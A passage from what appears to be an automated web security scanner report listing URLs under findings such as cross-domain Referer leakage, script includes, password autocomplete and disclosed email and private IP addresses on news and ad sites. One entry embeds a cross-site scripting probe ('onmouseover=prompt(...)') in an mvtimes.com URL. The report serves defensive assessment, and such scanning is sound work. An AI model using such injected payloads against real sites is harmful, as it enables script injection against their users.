6.73. http://bcp.crwdcntrl.net/4/c=492%7Crand=708673296%7Cpv=y%7Crt=ifr

6.74. http://bcp.crwdcntrl.net/4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr

6.75. http://bcp.crwdcntrl.net/4/c=492%7Crand=769353744%7Cpv=y%7Crt=ifr

6.76. http://bcp.crwdcntrl.net/4/c=492%7Crand=770680268%7Cpv=y%7Crt=ifr

6.77. http://bcp.crwdcntrl.net/4/c=492%7Crand=775566438%7Cpv=y%7Crt=ifr

6.78. http://bcp.crwdcntrl.net/4/c=492%7Crand=827998426%7Cpv=y%7Crt=ifr

6.79. http://bcp.crwdcntrl.net/4/c=492%7Crand=939941480%7Cpv=y%7Crt=ifr

6.80. http://bcp.crwdcntrl.net/4/c=492%7Crand=996397162%7Cpv=y%7Crt=ifr

6.81. http://bh.contextweb.com/bh/rtset

6.82. http://bh.contextweb.com/bh/sync/admeld

6.83. http://bs.serving-sys.com/BurstingPipe/adServer.bs

6.84. http://cf.addthis.com/red/p.json

6.85. http://content.yieldmanager.com/ak/q.gif

6.86. http://cspix.media6degrees.com/orbserv/hbpix

6.87. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/TEDYGTRZH5DVRIBZAHSESJ

6.88. http://d.adroll.com/pixel/24H2I4YFKNA3JHF7DBOLEQ/J2XVQLHIHRDGBKODSAL526

6.89. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4608069584519221037

6.90. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4608069584519221037

6.91. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4608069584519221037

6.92. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4608069584519221037

6.93. http://d.p-td.com/r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4d97b063-cd55-fcc9-f79b-3dc3c331fd5b

6.94. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js

6.95. http://data.adsrvr.org/map/cookie/google

6.96. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json

6.97. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json

6.98. http://h.zedo.com/init/0.4907234441488981/g.gif

6.99. http://h.zedo.com/init/0.6948210536502302/g.gif

6.100. http://image2.pubmatic.com/AdServer/Pug

6.101. http://insight.adsrvr.org/track/conv

6.102. http://js.revsci.net/gateway/gw.js

6.103. http://l.betrad.com/ct/0_0_0_0_0_624/us/0/1/0/0/0/0/1/242/141/0/pixel.gif

6.104. http://l.betrad.com/ct/0_0_0_0_179_1228/us/0/1/0/0/0/0/1/242/279/0/pixel.gif

6.105. http://leadback.advertising.com/adcedge/lb

6.106. http://lfov.net/favicon.ico

6.107. http://lfov.net/webrecorder/g/chimera.js

6.108. http://lfov.net/webrecorder/js/listen.js

6.109. http://lfov.net/webrecorder/w

6.110. http://load.exelator.com/load/

6.111. http://loadm.exelator.com/load/

6.112. http://metrics.foxnews.com/b/ss/foxnews/1/H.20.3/s57025025668554

6.113. http://odb.outbrain.com/utils/get

6.114. http://odb.outbrain.com/utils/ping.html

6.115. http://pix04.revsci.net/D08734/a1/0/0/0.gif

6.116. http://pix04.revsci.net/E05510/b3/0/3/1003161/184358339.js

6.117. http://pix04.revsci.net/E05510/b3/0/3/1003161/317116761.js

6.118. http://pix04.revsci.net/E05510/b3/0/3/1003161/411477495.js

6.119. http://pix04.revsci.net/E05510/b3/0/3/1003161/564853216.js

6.120. http://pix04.revsci.net/E05510/b3/0/3/1003161/695826942.js

6.121. http://pix04.revsci.net/E05510/b3/0/3/1003161/737002840.js

6.122. http://pix04.revsci.net/E05510/b3/0/3/1003161/779915473.js

6.123. http://pix04.revsci.net/E05510/b3/0/3/1003161/794483737.js

6.124. http://pix04.revsci.net/E05510/b3/0/3/1003161/79844803.js

6.125. http://pix04.revsci.net/E05510/b3/0/3/1003161/844383816.js

6.126. http://pix04.revsci.net/E05510/b3/0/3/1003161/846854188.js

6.127. http://pix04.revsci.net/E05511/a4/0/0/pcx.js

6.128. http://pix04.revsci.net/E05511/b3/0/3/0902121/10608952.js

6.129. http://pix04.revsci.net/E05511/b3/0/3/0902121/135299998.js

6.130. http://pix04.revsci.net/E05511/b3/0/3/0902121/209148801.js

6.131. http://pix04.revsci.net/E05511/b3/0/3/0902121/21225103.js

6.132. http://pix04.revsci.net/E05511/b3/0/3/0902121/281102501.js

6.133. http://pix04.revsci.net/E05511/b3/0/3/0902121/285224161.js

6.134. http://pix04.revsci.net/E05511/b3/0/3/0902121/316223818.js

6.135. http://pix04.revsci.net/E05511/b3/0/3/0902121/354226275.js

6.136. http://pix04.revsci.net/E05511/b3/0/3/0902121/64495114.js

6.137. http://pix04.revsci.net/E05511/b3/0/3/0902121/695595891.js

6.138. http://pix04.revsci.net/E05511/b3/0/3/0902121/699418016.js

6.139. http://pix04.revsci.net/E05511/b3/0/3/0902121/700224037.js

6.140. http://pix04.revsci.net/E05511/b3/0/3/0902121/71706519.js

6.141. http://pix04.revsci.net/E05511/b3/0/3/0902121/734832866.js

6.142. http://pix04.revsci.net/E05511/b3/0/3/0902121/73563402.js

6.143. http://pix04.revsci.net/E05511/b3/0/3/0902121/806386945.js

6.144. http://pix04.revsci.net/E05511/b3/0/3/0902121/871550918.js

6.145. http://pix04.revsci.net/E05511/b3/0/3/0902121/914837697.js

6.146. http://pix04.revsci.net/E05511/b3/0/3/0902121/918432446.js

6.147. http://pixel.33across.com/ps/

6.148. http://pixel.invitemedia.com/adnxs_sync

6.149. http://pixel.quantserve.com/pixel

6.150. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

6.151. http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif

6.152. http://pixel.quantserve.com/seg/p-ddEiIs2qFSY46.js

6.153. http://pixel.rubiconproject.com/tap.php

6.154. http://r.openx.net/set

6.155. http://r.turn.com/r/bd

6.156. http://r.turn.com/r/beacon

6.157. http://r.turn.com/server/pixel.htm

6.158. http://r1-ads.ace.advertising.com/ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

6.159. http://r1-ads.ace.advertising.com/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

6.160. http://segment-pixel.invitemedia.com/pixel

6.161. http://segment-pixel.invitemedia.com/unpixel

6.162. http://segments.adap.tv/data

6.163. http://segments.adap.tv/data/

6.164. http://server.iad.liveperson.net/hc/47227738/

6.165. http://server.iad.liveperson.net/hc/47227738/

6.166. http://sync.adap.tv/sync

6.167. http://sync.mathtag.com/sync/img

6.168. http://sync.tidaltv.com/adaptv.ashx

6.169. http://tacoda.at.atwola.com/rtx/r.js

6.170. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom

6.171. http://tags.bluekai.com/ids

6.172. http://tags.bluekai.com/site/2174

6.173. http://tags.bluekai.com/site/2731

6.174. http://tags.bluekai.com/site/668

6.175. http://trc.taboolasyndication.com/hearst-wptz/log/2/visible

6.176. http://valtira.com/page/1/valtira-Marketing-Tools.jsp

6.177. http://valtira.com/page/1/valtira-contact-od.jsp

6.178. http://vlog.leadforce1.com/bf/bf.php

6.179. http://wcax.upickem.net/engine/Splash.aspx

6.180. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

6.181. https://www.google.com/accounts/ServiceLogin

6.182. http://www.marqui.com/

6.183. http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx

6.184. http://www.mvtimes.com/marthas-vineyard/includes/common/captchaImage.php

6.185. http://www.wesh.com/images/structures/misc/play_overlay_small.png

6.186. http://www.wmur.com/images/structures/tabs/sponsor_tile_transparent.png

6.187. http://www.wptz.com/

6.188. http://www.wtp101.com/ab_sync

6.189. http://xcdn.xgraph.net/15530/db/xg.gif

6.190. http://y.cdn.adblade.com/imps.php

7. Password field with autocomplete enabled

7.1. http://appointron.com/login

7.2. http://appointron.com/users/new

7.3. http://bounce.adbrite.com/

7.4. http://bounce.adbrite.com/

7.5. http://wcax.upickem.net/engine/Splash.aspx

7.6. https://www.google.com/accounts/NewAccount

7.7. https://www.google.com/accounts/ServiceLogin

7.8. http://www.wcax.com/global/PM/registration.asp

7.9. http://www.wcax.com/global/PM/registration.asp

8. Referer-dependent response

8.1. http://ad.yieldmanager.com/imp

8.2. http://ads.adbrite.com/adserver/vdi/682865

8.3. http://ads.adbrite.com/adserver/vdi/684339

8.4. http://ads.adbrite.com/adserver/vdi/712156

8.5. http://ads.adbrite.com/adserver/vdi/742697

8.6. http://ads.adbrite.com/adserver/vdi/762701

8.7. http://ads.adbrite.com/adserver/vdi/779045

8.8. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

8.9. http://pixel.adsafeprotected.com/jspix

8.10. http://www.facebook.com/plugins/like.php

8.11. http://www.youtube.com/v/BXKQ0elgHdY

9. Cross-domain POST

10. Cross-domain Referer leakage

10.1. http://a.rfihub.com/sed

10.2. http://ad.doubleclick.net/adi/fnc/root/stocksearch

10.3. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.4. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.5. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.6. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.7. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.8. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.9. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.10. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.11. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.12. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.13. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.14. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.15. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.16. http://ad.doubleclick.net/adi/wn.loc.wcax/community

10.17. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.18. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.19. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.20. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.21. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.22. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.23. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.24. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.25. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.26. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.27. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.28. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

10.29. http://ad.doubleclick.net/adi/wn.loc.wcax/mostpopular

10.30. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.31. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.32. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.33. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.34. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.35. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.36. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.37. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.38. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.39. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.40. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.41. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.42. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.43. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.44. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.45. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.46. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.47. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.48. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.49. http://ad.doubleclick.net/adi/wn.loc.wcax/news

10.50. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-national

10.51. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-state

10.52. http://ad.doubleclick.net/adi/wn.loc.wcax/political

10.53. http://ad.doubleclick.net/adi/wn.loc.wcax/political

10.54. http://ad.doubleclick.net/adi/wn.loc.wcax/political

10.55. http://ad.doubleclick.net/adi/wn.loc.wcax/political

10.56. http://ad.doubleclick.net/adi/wn.loc.wcax/political

10.57. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1

10.58. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1

10.59. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1

10.60. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1

10.61. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle

10.62. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle

10.63. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle

10.64. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle

10.65. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle

10.66. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle

10.67. http://ad.doubleclick.net/adi/wn.loc.wcax/weather

10.68. http://ad.doubleclick.net/adi/wn.loc.wcax/weather

10.69. http://ad.doubleclick.net/adi/wn.loc.wcax/weather

10.70. http://ad.doubleclick.net/adi/wn.loc.wcax/weather

10.71. http://ad.doubleclick.net/adi/wn.loc.wcax/weather

10.72. http://ad.doubleclick.net/adi/wn.loc.wcax/weather

10.73. http://ad.doubleclick.net/adj/N2998.153021.9061335280621/B5095407.18

10.74. http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010

10.75. http://ad.doubleclick.net/adj/fnc/politics

10.76. http://ad.doubleclick.net/adj/fnc/politics

10.77. http://ad.doubleclick.net/adj/fnc/politics

10.78. http://ad.doubleclick.net/adj/fnc/politics

10.79. http://ad.doubleclick.net/adj/fnc/politics

10.80. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail

10.81. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail

10.82. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail

10.83. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index

10.84. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index

10.85. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index

10.86. http://ad.doubleclick.net/adj/ibs.pla.homepage/local

10.87. http://ad.doubleclick.net/adj/ibs.pla.homepage/local

10.88. http://ad.doubleclick.net/adj/ibs.pla.homepage/local

10.89. http://ad.doubleclick.net/adj/ibs.pla.homepage/local

10.90. http://ad.doubleclick.net/adj/ibs.pla.homepage/local

10.91. http://ad.doubleclick.net/adj/ibs.pla.homepage/local

10.92. http://ad.doubleclick.net/adj/ibs.pla.homepage/local

10.93. http://ad.doubleclick.net/adj/ibs.pla.homepage/local

10.94. http://ad.doubleclick.net/adj/ibs.pla.news/local

10.95. http://ad.doubleclick.net/adj/ibs.pla.news/local

10.96. http://ad.doubleclick.net/adj/ibs.pla.news/local

10.97. http://ad.doubleclick.net/adj/wn.loc.wcax/community

10.98. http://ad.doubleclick.net/adj/wn.loc.wcax/homepage

10.99. http://ad.doubleclick.net/adj/wn.loc.wcax/news

10.100. http://ad.doubleclick.net/adj/wn.loc.wcax/political

10.101. http://ad.doubleclick.net/adj/wn.loc.wcax/promotion1

10.102. http://ad.doubleclick.net/adj/wn.loc.wcax/sales-lifestyle

10.103. http://ad.doubleclick.net/adj/wn.loc.wcax/sales-travel

10.104. http://ad.doubleclick.net/adj/wn.loc.wcax/weather

10.105. http://ad.turn.com/server/ads.js

10.106. http://ad.yieldmanager.com/iframe3

10.107. http://ad.yieldmanager.com/iframe3

10.108. http://ad.yieldmanager.com/iframe3

10.109. http://ad.yieldmanager.com/iframe3

10.110. http://ad.yieldmanager.com/pixel

10.111. http://admeld-match.dotomi.com/admeld/match

10.112. http://admeld.adnxs.com/usersync

10.113. http://admeld.lucidmedia.com/clicksense/admeld/match

10.114. http://ads.adsonar.com/adserving/getAds.jsp

10.115. http://ads.financialcontent.com/www/delivery/afr.php

10.116. http://ads.foxnews.com/js/ad.js

10.117. http://ads2.adbrite.com/v0/ad

10.118. http://ads2.adbrite.com/v0/ad

10.119. http://adserver.veruta.com/cookiematch.fcgi

10.120. http://adserver.veruta.com/cookiematch.fcgi

10.121. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

10.122. http://bcp.crwdcntrl.net/px

10.123. http://bh.contextweb.com/bh/sync/admeld

10.124. http://blackpearl.wcax.com/wcax/PROMOTION/promotions.html

10.125. http://clientapps.kickapps.com/hearst/articleTitles.php

10.126. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php

10.127. http://cm.g.doubleclick.net/pixel

10.128. http://cm.g.doubleclick.net/pixel

10.129. http://cm.g.doubleclick.net/pixel

10.130. http://cm.g.doubleclick.net/pixel

10.131. http://cm.g.doubleclick.net/pixel

10.132. http://content.worldnow.com/global/tools/video/WNVideoCodebase_v2.js

10.133. http://cplads.appspot.com/creatives/aio_300_250/GoogleForm_dp.html

10.134. http://fls.doubleclick.net/activityi

10.135. http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html

10.136. http://googleads.g.doubleclick.net/pagead/ads

10.137. http://googleads.g.doubleclick.net/pagead/ads

10.138. http://googleads.g.doubleclick.net/pagead/ads

10.139. http://googleads.g.doubleclick.net/pagead/ads

10.140. http://googleads.g.doubleclick.net/pagead/ads

10.141. http://googleads.g.doubleclick.net/pagead/ads

10.142. http://googleads.g.doubleclick.net/pagead/ads

10.143. http://googleads.g.doubleclick.net/pagead/ads

10.144. http://googleads.g.doubleclick.net/pagead/ads

10.145. http://googleads.g.doubleclick.net/pagead/ads

10.146. http://googleads.g.doubleclick.net/pagead/ads

10.147. http://googleads.g.doubleclick.net/pagead/ads

10.148. http://googleads.g.doubleclick.net/pagead/ads

10.149. http://googleads.g.doubleclick.net/pagead/ads

10.150. http://googleads.g.doubleclick.net/pagead/ads

10.151. http://googleads.g.doubleclick.net/pagead/ads

10.152. http://googleads.g.doubleclick.net/pagead/ads

10.153. http://googleads.g.doubleclick.net/pagead/ads

10.154. http://googleads.g.doubleclick.net/pagead/ads

10.155. http://googleads.g.doubleclick.net/pagead/ads

10.156. http://googleads.g.doubleclick.net/pagead/ads

10.157. http://googleads.g.doubleclick.net/pagead/ads

10.158. http://googleads.g.doubleclick.net/pagead/ads

10.159. http://googleads.g.doubleclick.net/pagead/ads

10.160. http://googleads.g.doubleclick.net/pagead/ads

10.161. http://ib.adnxs.com/ab

10.162. http://ib.adnxs.com/if

10.163. http://ib.adnxs.com/ptj

10.164. http://ib.adnxs.com/ptj

10.165. http://insight.adsrvr.org/track/conv

10.166. http://pixel.invitemedia.com/admeld_sync

10.167. http://provideby.com/show_dynamic/coupon/livingsocial-fnews/300x250-POL/

10.168. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom

10.169. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom

10.170. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom

10.171. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros

10.172. http://um.simpli.fi/am_js.js

10.173. http://wcax.upickem.net/engine/Splash.aspx

10.174. http://wcax.upickem.net/engine/Splash.aspx

10.175. http://wcax.upickem.net/engine/Splash.aspx

10.176. http://websiteoptimizer.blogspot.com/

10.177. http://wptz.placelocal.com/_js/ad.js.php

10.178. http://www.acquisio.com/wp-content/plugins/ilc-folding/folding.js

10.179. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.180. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.181. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.182. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.183. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.184. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.185. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.186. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.187. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.188. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

10.189. http://www.foxnews.com/static/all/js/ad.js

10.190. http://www.foxnews.com/static/fn2/ws/politics/js/channel.js

10.191. http://www.mvtimes.com/marthas-vineyard/article.php

10.192. http://www.mvtimes.com/marthas-vineyard/article.php

10.193. http://www.mvtimes.com/marthas-vineyard/directory/

10.194. http://www.vermontopia.com/event/

10.195. http://www.wcax.com/Global/category.asp

10.196. http://www.wcax.com/Global/category.asp

10.197. http://www.wcax.com/Global/category.asp

10.198. http://www.wcax.com/Global/category.asp

10.199. http://www.wcax.com/Global/category.asp

10.200. http://www.wcax.com/Global/link.asp

10.201. http://www.wcax.com/Global/story.asp

10.202. http://www.wcax.com/Global/story.asp

10.203. http://www.wcax.com/Global/story.asp

10.204. http://www.wcax.com/Global/story.asp

10.205. http://www.wcax.com/build.asp

10.206. http://www.wcax.com/global/link.asp

10.207. http://y.cdn.adblade.com/imps.php

11. Cross-domain script include

11.1. http://a.rfihub.com/sed

11.2. http://ad.doubleclick.net/adi/fnc/root/stocksearch

11.3. http://ad.doubleclick.net/adi/wn.loc.wcax/community

11.4. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

11.5. http://ad.doubleclick.net/adi/wn.loc.wcax/news

11.6. http://ad.doubleclick.net/adi/wn.loc.wcax/news

11.7. http://ad.doubleclick.net/adi/wn.loc.wcax/news

11.8. http://ad.doubleclick.net/adi/wn.loc.wcax/political

11.9. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1

11.10. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1

11.11. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle

11.12. http://ad.doubleclick.net/adi/wn.loc.wcax/weather

11.13. http://ad.turn.com/server/ads.js

11.14. http://ad.yieldmanager.com/iframe3

11.15. http://ads2.adbrite.com/v0/ad

11.16. http://ads2.adbrite.com/v0/ad

11.17. http://appointron.com/

11.18. http://appointron.com/features

11.19. http://appointron.com/login

11.20. http://appointron.com/pricing

11.21. http://bcp.crwdcntrl.net/px

11.22. http://cplads.appspot.com/creatives/aio_300_250/GoogleForm_dp.html

11.23. http://fls.doubleclick.net/activityi

11.24. http://googleads.g.doubleclick.net/pagead/ads

11.25. http://googleads.g.doubleclick.net/pagead/ads

11.26. http://googleads.g.doubleclick.net/pagead/ads

11.27. http://googleads.g.doubleclick.net/pagead/ads

11.28. http://googleads.g.doubleclick.net/pagead/ads

11.29. http://googleads.g.doubleclick.net/pagead/ads

11.30. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom

11.31. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom

11.32. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom

11.33. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros

11.34. http://valtira.com/script/200.jsp

11.35. http://wcax.upickem.net/engine/Splash.aspx

11.36. http://websiteoptimizer.blogspot.com/

11.37. http://wptz.placelocal.com/_js/ad.js.php

11.38. http://www.acquisio.com/wp-content/plugins/ilc-folding/folding.js

11.39. http://www.clickability.com/

11.40. http://www.foxnews.com/politics/index.html

11.41. http://www.ingeniux.com/resources/solutions-articles/mobile-content-deployment

11.42. http://www.ingeniux.com/solutions/website_optimization

11.43. http://www.internetrix.net/page/contact-us/

11.44. http://www.marqui.com/

11.45. http://www.marqui.com/company/contact-us/

11.46. http://www.marqui.com/images/global/loadingAnimation.gif

11.47. http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx

11.48. http://www.motivitycms.com/contact.aspx

11.49. http://www.motivitycms.com/motivity-customers.aspx

11.50. http://www.mvtimes.com/archives/

11.51. http://www.mvtimes.com/expired.php

11.52. http://www.mvtimes.com/marthas-vineyard/article.php

11.53. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E

11.54. http://www.mvtimes.com/marthas-vineyard/directory/

11.55. http://www.mvtimes.com/marthas-vineyard/on-island.php

11.56. http://www.pagevester.com/en/product/Google-Website-Optimizer.asp

11.57. http://www.vermontopia.com/

11.58. http://www.vermontopia.com/event/

11.59. http://www.vermontopia.com/favicon.ico

11.60. http://www.wcax.com/

11.61. http://www.wcax.com/Global/category.asp

11.62. http://www.wcax.com/Global/category.asp

11.63. http://www.wcax.com/Global/category.asp

11.64. http://www.wcax.com/Global/link.asp

11.65. http://www.wcax.com/Global/story.asp

11.66. http://www.wcax.com/Global/story.asp

11.67. http://www.wcax.com/build.asp

11.68. http://www.wptz.com/index.html

11.69. http://www.wptz.com/news/27483035/detail.html

11.70. http://www.wptz.com/news/index.html

11.71. http://y.cdn.adblade.com/imps.php

12. File upload functionality

13. Email addresses disclosed

13.1. http://ads.adbrite.com/adserver/vdi/682865

13.2. http://ads.adbrite.com/adserver/vdi/682865

13.3. http://ads.adbrite.com/adserver/vdi/684339

13.4. http://ads.adbrite.com/adserver/vdi/684339

13.5. http://ads.adbrite.com/adserver/vdi/712156

13.6. http://ads.adbrite.com/adserver/vdi/742697

13.7. http://ads.adbrite.com/adserver/vdi/762701

13.8. http://ads.adbrite.com/adserver/vdi/779045

13.9. http://ads.foxnews.com/js/omtr_code.js

13.10. http://ads2.adbrite.com/v0/ad

13.11. http://ads2.adbrite.com/v0/ad

13.12. http://ads2.adbrite.com/v0/ad

13.13. http://appointron.com/javascripts/controls.js

13.14. http://appointron.com/javascripts/dragdrop.js

13.15. http://cdn.js-kit.com/scripts/comments.js

13.16. http://cdn.taboolasyndication.com/libtrc/hearst-wptz/rbox.en.4-6-12-44788.json

13.17. http://cdnserve.a-feed.com/service/getFeed2.kickAction

13.18. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php

13.19. http://kellwood.com/home.asp

13.20. http://nmp.newsgator.com/NGBuzz/3656/load.ashx/buzz

13.21. http://nmp.newsgator.com/NGBuzz/buzz.ashx

13.22. http://valtira.com/page/1/valtira-Marketing-Tools.jsp

13.23. http://vermontopia.com/scripts/jquery/jcrop/js/jquery.Jcrop.js

13.24. http://vermontopia.com/scripts/jquery/jquery.cookie.js

13.25. http://widgets.outbrain.com/outbrainWidget.js

13.26. http://widgets.twimg.com/j/2/widget.js

13.27. http://www.acquisio.com/js_capture_source/jquery.cookie.js

13.28. http://www.clickability.com/templates/Corp_Scripts_Template.js

13.29. http://www.foxnews.com/

13.30. http://www.foxnews.com/politics/index.html

13.31. http://www.foxnews.com/static/all/css/screen.css

13.32. http://www.foxnews.com/static/all/js/jquery.plugins.js

13.33. https://www.google.com/accounts/ServiceLogin

13.34. http://www.ingeniux.com/resources/solutions-articles/mobile-content-deployment

13.35. http://www.ingeniux.com/solutions/website_optimization

13.36. http://www.internetrix.net/js/script.aculo.us/dragdrop.js

13.37. http://www.internetrix.net/js/script.aculo.us/glider.js

13.38. http://www.internetrix.net/page/articles/latest-news/

13.39. http://www.marqui.com/company/contact-us/

13.40. http://www.vermontopia.com/scripts/jquery/jcrop/js/jquery.Jcrop.js

13.41. http://www.vermontopia.com/scripts/jquery/jquery.cookie.js

13.42. http://www.wcax.com/Global/story.asp

13.43. http://www.wcax.com/build.asp

13.44. http://www.wptz.com/esi/postcaching/getKAtoken.esi

13.45. http://www.wptz.com/javascript/script.js

13.46. http://www.wptz.com/news/27483035/detail.html

14. Private IP addresses disclosed

14.1. http://kellwood.com/_images/aboutPage.jpg

14.2. http://kellwood.com/_images/careersOff.png

14.3. http://kellwood.com/_images/contactLink1off.gif

14.4. http://kellwood.com/_images/contactLink1over.gif

14.5. http://kellwood.com/_images/contactLink2off.gif

14.6. http://kellwood.com/_images/contactLink2over.gif

14.7. http://kellwood.com/_images/contactLink3off.gif

14.8. http://kellwood.com/_images/contactLink3over.gif

14.9. http://kellwood.com/_images/contactLink4off.gif

14.10. http://kellwood.com/_images/contactLink5off.gif

14.11. http://kellwood.com/_images/contactsPage.jpg

14.12. http://kellwood.com/_images/copywright.png

14.13. http://kellwood.com/_images/dash.png

14.14. http://kellwood.com/_images/kellwoodLogo.gif

14.15. http://kellwood.com/_images/menu1top.png

14.16. http://kellwood.com/_images/menu2top.png

14.17. http://kellwood.com/_images/menu3top.png

14.18. http://kellwood.com/_images/menuSlider.png

14.19. http://kellwood.com/_images/pTitleBar.png

14.20. http://kellwood.com/_images/privacyPolicyOff.png

14.21. http://kellwood.com/_images/separator.png

14.22. http://kellwood.com/_images/shim.gif

14.23. http://kellwood.com/brand_images/adam.jpg

14.24. http://kellwood.com/brand_images/babyphat.jpg

14.25. http://kellwood.com/brand_images/blkdnm.jpg

14.26. http://kellwood.com/brand_images/briggs.jpg

14.27. http://kellwood.com/brand_images/davidmeister.jpg

14.28. http://kellwood.com/brand_images/democracy.jpg

14.29. http://kellwood.com/brand_images/jax.jpg

14.30. http://kellwood.com/brand_images/jolt.jpg

